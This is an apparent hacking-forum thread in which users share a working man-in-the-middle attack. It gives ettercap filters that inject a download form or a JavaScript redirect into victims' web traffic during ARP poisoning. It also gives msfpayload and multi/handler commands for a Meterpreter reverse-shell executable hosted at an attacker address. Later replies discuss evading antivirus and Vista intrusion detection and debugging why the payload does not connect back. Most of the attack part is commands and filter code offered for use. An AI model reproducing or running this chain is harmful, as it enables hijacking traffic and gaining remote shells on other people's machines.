Nice, but you need a fair amount of social engineeringCode:Let me know what you think
ettercap filter html injection meterpeter.exe
take a look at the filter, look at what is being replaced... its sort of html injection on the fly
if any one wants to see a quick video i can post one to give you a better idea
what i did was create a reverse meteperter executable then hosted it on a server and did
some arp poisoning with some html injection and you could use this to trick people into
downloading the .exe and get your self a shell
this is just a proof of concept and i take no responsibility
html.filter
i think this is the working filterCode:if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Nothing!"); } } if (ip.proto == TCP && tcp.src == 80) { if (search(DATA.data, "<title>")) { replace("</title>", "</title><form action="http://192.168.1.6/meterpeter.exe" method="link"><img src="http://192.168.1.6/alert.gif"><INPUT TYPE=submit value="DOWNLOAD meterpeter.exe"></form><html><body><h10>just some instructions</h10></body></html>"); msg("html injected"); }}
-create the meterpeter.exe-
(open msfconsole)
./msfpayload windows/meterpeter/reverse_tcp LHOST=192.168.1.6 LPORT=100 x > meterpeter.exe
Now place the executable into your Apache root directory
-set up your listener-
use exploit/multi/handler
set PAYLOAD windows/meterpeter/reverse_tcp
set LHOST 192.168.1.6
set LPORT 100
-execute ettercap-
etterfilter html.filter -o html.ef
ettercap -T -q -F html.ef -M ARP // //
now wait for some one on the network to download and execute meterpeter.exe and you will have a reverse shell
Let me know what you think
Nice, but you need a fair amount of social engineeringCode:Let me know what you think
Don't eat yellow snow :rolleyes:
If i had skill in html, java or php... the webpage would sell it self
maybe give me some suggestionsCode:<form action="http://192.168.1.6/meterpeter.exe" method="link"> <img src="http://192.168.1.6/alert.gif"> <INPUT TYPE=submit value="DOWNLOAD meterpeter.exe"> </form><html><body><h10>just some instructions</h10></body></html>
Don't pick me wrong, the idea is really nice. Unless you can't exploit some vulnerability you almost always depend on the user to click and/or download anything. Evilgrade is an exception to this.
Don't eat yellow snow :rolleyes:
http://www.infobyte.com.ar/demo/evilgrade.htm
wow this looks cool... i was not sure what evilgrade was
Hey BigMac
I recently posted about this, its in the newbie area under "Vista remote shell with phish" i have since perfected it... given a little time to work with it but i have a filter (dns wasnt working too well) that will redirect all traffic.
Thanks go out to hawaii67 for posting this filter some time ago, i'll try to find that post and put it in here later.
Try this as your filter, if the Target machine already has a web page open, it will give an error "404" after they attempt to refresh(or open another page) it will redirect to your HTTPD server.
#FILTER START#
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
msg("changed Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("<BODY", "
<BODY onload=\"javascript:document.location.href='inster t your site here'\"><XSS a=");
replace("<body", "
<body onload=\"javascript:document.location.href='insert your site here'\"><XSS a=");
msg("Filter Ran.\n");
}
#FILTER END#
--EDIT--
This post doesnt allow script spacing, but im sure you'll get it. I also have the web pages built
And the original script was posted in a Backtrack 2.0 post entitled "ettercap filters" page 2 of the post if anyone wants to read more about it.
<P ALIGN=center><IFRAME SRC="http://server" WIDTH=300 HEIGHT=100></IFRAME></P>
this iframe has potential
and check out irongeeks latest video's... bypass anti-vir fully undetected...
ill look into it
I watched the video, the problem with the normal way we both had going is that vista's ids picks it up (note that XP sp3 does not ...it just runs), this may solve that problem. The normal way with meterpreter/reverse_http does not set off ids, however it really doesnt work. I will play around with the code for the filter and with my setup and see if it gets past IDS. My money says it will. But ill let you know.
Also i think you will find that windows users have come to expect the OS asking them "do you want to?, do you really?, are you sure?, thats not such a good idea!, DO YOU REALLY!!!?".
lol, but again, give me a day or two to test some things and ill get back to you.
have you tested this msfencode? http://metasploit.com/dev/trac/wiki/...ingMeterpreter
its not working for me... i use the correct commands and check the ls -alrt and then i execute this payload on one of my computers but the exploit multi handler does not get a connection ? ? ? im stumped
No that one doesnt work for me.
i have tried it, i could not get it to work either, the only one that gives me a connection is the Original script, there must be something in the EXE payload thats not running, im still playing with it.
The next step for me is to start trouble shooting by running a few pre-made exe files and see if ANY connect back. If not, i will see if i cant find out why. I think it has something to do with the way the payload is initiated. Ill start trouble shooting tommorow.
Posting Permissions